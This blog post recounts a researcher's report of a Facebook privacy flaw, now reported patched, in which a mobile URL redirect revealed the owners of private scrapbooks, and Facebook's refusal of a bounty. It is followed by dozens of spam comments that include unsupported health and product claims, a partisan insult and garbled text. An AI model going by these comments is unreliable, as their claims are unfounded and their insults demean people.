The Beauty And The Thoughtful

Are you following FogMarks?

Today’s case-study is based on some recent events and misunderstandings I had with Facebook, and its main goal is to set researchers expectations from bug bounty programs. Both sides will be presented, of course, and you will be able to comment your opinion in the comments section.

So, back in July I have found that it is possible to link between Scrapebooks that users have opened for their pets or family members to the users themselves (who relate to the pet or family member), even if the privacy setting of the user to the pet or family member was set to ‘Only me’.

This was possible to be done by any user, even if the user was not friends with the victim. All he had to do was to access this Facebooks’s mobile URL: http://m.facebook.com/<SCRAPEBOOK_ID>/

After accessing this URL, the attacker was redirected to another URL: https://m.facebook.com/<CREATOR_FACEBOOK_USER_ID>/scrapbooks/ft.<SCRAPEBOOK_ID>/?_rdr

and the name and the type of the Scrapebook was displayed, even if the privacy setting of it was set to ‘Only me’ by the creating user (the victim).

12 days after the initial report Facebook said that the issue was ‘not reproduceable’, and after my reply I was asked to provide even more information, so I have created a full PoC video. Watch it to get the full picture and only then continue to read.

So, as you can see accessing the supplied URL indeed redirected the attacker to the Scrapebook account that was made by the victim, and revealed the Scrapebook name – which is not private, and the Scrapebook maker ID (the FBID of the victim user).

5 days after I have sent the PoC video Facebook finally acknowledged it and sent it forward for a fix.

2 months after the acknowledgement I have received a mail from Facebook, asking me to confirm the patch. They simply denied from unauthorized users to access the vulnerable URL and then to be redirected to the Scrapebook.

2 days after I confirmed the patch, I got a long mail reply stating:

Thanks for confirming the fix. I’ve discussed this report with the team and unfortunately we’ve determined that this report does not qualify under our program.

Ultimately the risk here was that someone who could guess the FBID of a scrapbook could see the owner of that scrapbook. The “name” here isn’t a private piece of information: it will show up whenever the child or pet is tagged, for example, and so any changes related to that aren’t particularly relevant here. The risk of someone searching such a large space of potential IDs in the hope of finding a particular type of object (rare) in a particular configuration (even rarer) makes it highly implausible that any information would be inadvertently discovered here. Even if you were to look through the space your search would be untargeted and could not recover information about a particular person.

In general we attempt to determine whether or not a report qualifies under our program shortly after the initial report is submitted. In this case we failed to do so, and you have my apologies for that. Please let me know if you have any additional questions here.

Or in short: Thanks for confirming the fix, we now see after we fixed it that the impact of the vulnerability was able to be achieved after some hard work – iterating over Scrapebook IDs, so the report is not qualified and you won’t be awarded for it.

And now I am asking: How rude can it be to hold a vulnerability for 3 months, fix it, and then, only then, after the fix is deployed in the production and there is no way to demonstrate another impact aspect, say to the researcher: “Thanks, but no thanks”.

This case-study is here to demonstrate researchers the various opinions that exist for every report. In your opinion the vulnerability is severe, a must-fix that should not even be questioned, but in the eyes of the company or the person who validates the vulnerability – it is a feature, not a bug.

I would like to hear your opinion regarding this in the comments section below, on Twitter or by email.

196 thoughts on “The Beauty And The Thoughtful

  1. Clinical status of the patieent iis the best method to follow thee effectiveness off testosterone therapy because ordinary levels
    are not well established.

    • Howdy very cool web site!! Man .. Beautiful .. Superb .. I&27#18;ll bookmark your website and take the feeds also? I am glad to seek out numerous helpful info right here within the put up, we want work out extra techniques in this regard, thanks for sharing. . . . . .

  2. A fascinating discussin is definitely worth comment. I
    think that you should write molre on this subject matter,it may not be a taboo matter but generally folks don’t
    iscuss these issues. To the next! Many thanks!!

  3. I think that everything said made a lot of sense.
    But, what about this? what if you wrote a catchier post title?
    I mean, I don’t ish to tell you howw to run your blog, but suppose you added a headline
    to maybe grab people’s attention? I mean The Beauty And The Thoughtful | FogMarks
    is kinda plain. Youu might look at Yahoo’s home page and watch how they create news titles to grab people to open the links.
    You might add a related video or a piic or two to grab people interested about everything’ve written. Just my opinion, iit could
    bring your blog a little bit more interesting.

  4. Please let me know if you’re looking for a article author for your site.
    You have some really good articles and I think I would be a good asset.
    If you ever want to take some of the load off, I’d
    love to write some material for your blog in exchange for a link back
    to mine. Please send me an email if interested. Regards!

    • à°ˆ à°®ాà°¤్à°°ం à°ª్à°°à°¸ంà°—ాà°²ు తట్à°Ÿుà°•ోà°²ేà°•à°ªోà°¤ే à°Žà°²ా సతీà°·్! à°¤్à°¯ాà°—à°°ాà°¯ à°—ాà°¨ సభలో à°ª్à°°à°¸ంà°—ాà°²ెà°ª్à°ªుà°¡ైà°¨ా à°šూà°¶ాà°°ా? à°µాà°®్à°®ో!à°…à°µుà°¨ూ, à°† à°…à°¬్à°¬ాà°¯ి à°ªేà°°ు ఏమిà°Ÿో à°¤ెà°²ుà°¸ుà°•ుà°¨్à°¨ాà°°ా? à°¦ాà°°ి à°ªొà°¡ుà°—ుà°¨ా అతడు ఆపకుంà°¡ా à°šà°•్à°•à°¨ి à°¸్à°«ూà°°్à°¤ి à°¦ాయకమైà°¨ à°¸్వరంà°¤ో à°¨ిà°¨ాà°¦ాà°²ు ఇస్à°¤ూà°¨ే ఉన్à°¨ాà°¡ు. à°† à°¶ునకాà°¨్à°¨ి à°¨ేà°¨ు గమనింà°šà°²ేà°¦ు.à°ªెà°³్à°³ి à°#4°°ేà°—&Š3135;ంపనుà°•ు&#307à;à°¦ేà°®ో!:-))

  5. What’s Taking place i’m new to this, I stumbled upon this I’ve discovered It absolutely helpful and it has aided me out loads.
    I’m hoping to contribute & help different customers like its helped me.

    Great job.

  6. I simply want to mention I am just all new to weblog and definitely liked you’re web site. Almost certainly I’m want to bookmark your site . You really have outstanding posts. Many thanks for sharing with us your blog.

  7. I think this iis among the most vital information for me.
    And i am glad reading your article. But wanna remark
    on some general things, The website style iss
    great, the articles iis realy excellent : D. Good
    job, cheers

  8. It’s the best time to make a few plans for the long run and it is time
    to be happy. I have read this publish and if I may I wish
    to suggest you some fascinating issues or advice.
    Perhaps you could write subsequent articles relating to this article.
    I wish to read even more things about it!

  9. Pretty soon, the liberal base will consist of nothing but airheads, freeloaders and scum. The most astonishing thing about their decline into shameless pandering is that they think we’re too stupid to see it.This has a lot to do with why I’ve gone from being a liberal Democrat to being a Libertarian conservative. I believe the Right can render the Left obsolete — if it breaks out of the grip of social reaisconariet. The Tea Party movement, if it stays true to its principles, can lead the way on this for Republicans and independents.

  10. -Ainda estou a espera. mas o melhor é esperar sentadinho…pois claro!-já que por este andar nem quando as galinhas tiverem dentes …os meus prezados companheiros da conversa da treta vão desenvolver o assunto de como se vai fazer ou se não se faz nada e se espera que chegue um ser divino e resolva o problema.-Vá lá façam um esforço e digam lá como tencionam fazer a revolução libertadora.Que força é essa amigo………..

  11. Kirsti:Ja, jeg måtte virkelig ta noen skritt tilbake og roe ned tempo og planlegging underveis, men så ble det også en veldig fin opplevelse. Ikke noen London Dungeon denne gang, for Lillesøster var for liten og trengte å få være med på å bestemme en del, men det får bli neste gang.

  12. Como curiosidad, la diferencia acumulada en los solsticios es parecida, en invierno amanece 30 minutos antes en Cádiz que en A Coruña, mientras que esa diferencia se soslaya en los equinoccios, claro.

  13. I always keep a journal of my travels. Details from my trip to Italy found their way into the manuscript I am just finishing up, and I am so glad I had kept notes. Even if you don’t want to write a book about it (you never know), it’s fun to remember the details. My blog is full of travel photos I took for our family enjoyment, never dreaming I would be using them to illustrate stories and posts on a blog. Fun post, Kathryn.

  14. You lost me, buddy. I mean, I suppose I get what youre stating. I recognize what you’re saying, but you just seem to have forgotten that you’ll find some other men and women in the world who look at this issue for what it truly is and might not agree with you. You might be turning away a lot of individuals who may have been supporters of your website.

  15. le mythe de Médée a inspiré des centaines d’adaptations, avec un bonheur fort inégal. Je recommande à ceux qui seraient intéressés : » Médée antique et moderne, aspects rituels et socio-politiques d’un mythe » par Duarte Mimoso-Ruiz, édité par l’ Association des publications près les universités de Strasbourg

  16. . I have “known” Steph since we both first started blogging. Yes, she makes me want to paint or write a poem (such an accurate statement!), but she has more often inspired me to write more creatively — with my heart instead of my head. To “just write,” as you Heather, are encouraging so many of us to do right now as well.I love this little look “inside” and Steph’s responses certainly put everything into perspective. Thanks for sharing!

  17. For a few years now has been getting right into Kamishibai – the “Japanese art of paper theatre”. It’s more traditional storytelling – often with music, not quite so related to stand up comedy as these other events seem to be, but still a good time. He blogs about it , and there’s a video up , but obviously it’s not quite the same as in person.

  18. I have been buying and using this product for over two years now. There are a lot of scams out there and I certainly tried a lot of them. But Dermasolve worked for me. The cream is really thick and when I use it my skin feels like it has locked in moisture. I have had psoriasis for over 7 years now and this is the first product that has given me any satisfaction.

  19. Hey very cool site!! Man .. Beautiful .. Amazing .. I will bookmark your website and take the feeds also…I’m happy to find so many useful information here in the post, we need develop more strategies in this regard, thanks for sharing. . . . . .

  20. Contamos con un departamento de servicios técnicos especializados en electrodomésticos industriales de hostelería, sabemos la importancia de que un negocio industria no se puede parar, sobre todo cuando está en plena actividad, es por eso que contamos con servicios de intervención rápida, con un amplio horario todo con teléfono de urgencia disponible 24 horas.

  21. Le ofrecemos más de 25 años de experiencia en soluciones de climatización Junkers en Madrid, ámbito doméstico e industrial. La división de negocio de climatización se integra dentro de nuestro catálogo de reformas general en el que se incluyen también servicios de capintería de aluminio, carpintería de pvc, reformas y decoración. Somos verdaderos especialistas en la reparación de calderas de todas clases y que abastecen a pequeñas grandes construcciones. Reparamos su electrodoméstico en menos de 48 horas ó 24 horas en Servicio de Urgencia, festivos incluidos.

  22. After I originally commented I appear to have clicked on the -Notify me when new comments
    are added- checkbox and now every time a comment is added I recieve 4 emails
    with the exact same comment. Is there a way you can remove me from that service?

    Thanks a lot!

  23. You’re so cool! I don’t believe I’ve read through a single thing like this before.
    So good to find another person with some unique thoughts on this topic.
    Really.. many thanks for starting this up. This site is something that is
    needed on the web, someone with a bit of originality!

  24. Hey I know this is off topic but I was wondering if you knew of any widgets I
    could add to my blog that automatically tweet
    my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this.
    Please let me know if you run into anything. I truly enjoy
    reading your blog and I look forward to your new updates.

  25. I’m often to blogging and i actually respect your content. The article has really peaks my interest. I am going to bookmark your website and maintain checking for brand spanking new information.

  26. I’m reaⅼly loving the theme/design of your weƅloǥ.
    Do you ever run into any internet browseг compatibility problems?
    A numƅer of my bⅼoց visitoгs have complained about my blog not աorking
    correctly in Explorer but looks grеat in Opera.
    Do you have any tips to help fix tɦis issue?

  27. Howdy would you mind stating which blog platform you’re using?
    I’m planning to start my own blog in the near future but I’m having a tough time making a decision between BlogEngine/Wordpress/B2evolution and Drupal.
    The reason I ask is because your layout seems different then most
    blogs and I’m looking for something completely unique.
    P.S Sorry for getting off-topic but I had to ask!

  28. Thanks , I have recently been looking for info about this subject for a long time and yours is the greatest I’ve found out
    so far. However, what concerning the bottom line?
    Are you positive in regards to the supply?

  29. Howdy are using WordPress for your site platform? I’m new to the
    blog world but I’m trying to get started and set up my own.
    Do you need any html coding knowledge to make your
    own blog? Any help would be greatly appreciated!

  30. Greetings, There’s no doubt that your site could possibly be having web
    browser compatibility issues. When I take a look at your
    web site in Safari, it looks fine however when opening in Internet Explorer,
    it has some overlapping issues. I merely wanted to give you a quick heads up!
    Apart from that, excellent blog!

  31. Hello, i read your blog occasionally and i own a similar
    one and i was just wondering if you get a lot of spam feedback?
    If so how do you reduce it, any plugin or anything
    you can suggest? I get so much lately it’s driving me crazy
    so any assistance is very much appreciated.

  32. My coder is trying to convince me to move to .net from PHP.

    I have always disliked the idea because of the
    costs. But he’s tryiong none the less. I’ve been using Movable-type on a number of websites
    for about a year and am worried about switching to another platform.

    I have heard fantastic things about blogengine.net.

    Is there a way I can transfer all my wordpress posts into it?
    Any kind of help would be greatly appreciated!

  33. Hey there! I just wanted to ask if you ever have any trouble with hackers? My last blog (wordpress) was hacked and I ended up losing months of hard work due to no data backup. Do you have any solutions to stop hackers?

  34. Hello! I know this is kinda off topic but I was wondering which blog platform are
    you using for this website? I’m getting sick and tired of WordPress
    because I’ve had problems with hackers and I’m looking
    at alternatives for another platform. I would be awesome if you could point me
    in the direction of a good platform.

  35. Having read this I believed it was very enlightening. I appreciate
    you taking the time and effort to put this content together.
    I once again find myself spending a significant amount of
    time both reading and leaving comments. But
    so what, it was still worth it!

  36. Hi there I am so thrilled I found your weblog, I really found you by accident,
    while I was browsing on Askjeeve for something else, Anyhow I am here now and
    would just like to say thank you for a fantastic
    post and a all round entertaining blog (I also love the theme/design),
    I don’t have time to read it all at the moment but I have saved it and also added in your RSS feeds,
    so when I have time I will be back to read more,
    Please do keep up the excellent work.

  37. Wow, amazing weblog format! How lengthy have you been running a blog for?
    you make running a blog look easy. The full glance of your site is wonderful, let
    alone the content material!

  38. Hello there, just became aware of your blog through Google, and
    found that it is truly informative. I’m gonna watch out
    for brussels. I will be grateful if you continue this
    in future. Lots of people will be benefited from your writing.

    Cheers!

  39. You guys are sik perchers,come up to my lake, lake simcoe perch capital. nice videos watched your ice fishn vids too I am just getting into perch this year they tricky . keep up the good fishn……

  40. I will right away snatch your rss feed as I can’t find your email subscription link or newsletter service. Do you have any? Please allow me realize so that I may just subscribe. Thanks.

  41. First of all I would like to say wonderful blog! I had a quick question in which I’d like to ask if you don’t mind. I was curious to find out how you center yourself and clear your mind before writing. I have had trouble clearing my mind in getting my ideas out there. I truly do enjoy writing however it just seems like the first 10 to 15 minutes are lost just trying to figure out how to begin. Any ideas or hints? Thank you!

  42. I’ve been surfing online more than 3 hours today, yet I never found any interesting article like yours. It is pretty worth enough for me. Personally, if all webmasters and bloggers made good content as you did, the internet will be a lot more useful than ever before.

  43. Just want to say your article is as surprising. The clarity on your publish is just nice and i can suppose you’re knowledgeable on this subject. Well together with your permission allow me to clutch your RSS feed to stay updated with forthcoming post. Thank you 1,000,000 and please continue the enjoyable work.

  44. I love your blog.. very nice colors & theme. Did you design this website yourself or did you hire someone to do it for you? Plz answer back as I’m looking to create my own blog and would like to find out where u got this from. thank you

  45. I beloved as much as you will receive performed right here. The sketch is tasteful, your authored subject matter stylish. however, you command get got an shakiness over that you would like be turning in the following. sick for sure come further before once more as precisely the similar nearly a lot incessantly within case you protect this increase.

  46. Hi there, i read your blog occasionally and i own a similar one and i was just curious if you get a lot of spam remarks? If so how do you protect against it, any plugin or anything you can advise? I get so much lately it’s driving me crazy so any help is very much appreciated.

  47. I’m usually to blogging and i actually appreciate your content. The article has really peaks my interest. I’m going to bookmark your website and maintain checking for new information.

Leave a Reply

Your email address will not be published. Required fields are marked *

*